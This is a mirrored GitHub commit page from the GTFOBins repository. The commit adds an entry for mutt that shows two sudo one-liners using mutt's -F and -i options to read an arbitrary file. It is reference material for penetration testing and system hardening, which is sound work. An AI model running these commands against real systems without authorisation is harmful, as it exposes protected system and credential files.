mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-24 22:09:35 +01:00
Add mutt
This commit is contained in:
parent
ac8e667a7e
commit
e606f86835
10
_gtfobins/mutt.md
Normal file
10
_gtfobins/mutt.md
Normal file
@ -0,0 +1,10 @@
|
||||
---
|
||||
functions:
|
||||
sudo:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo mutt -F $LFILE
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
sudo mutt -i $LFILE
|
||||
---
|
Loading…
Reference in New Issue
Block a user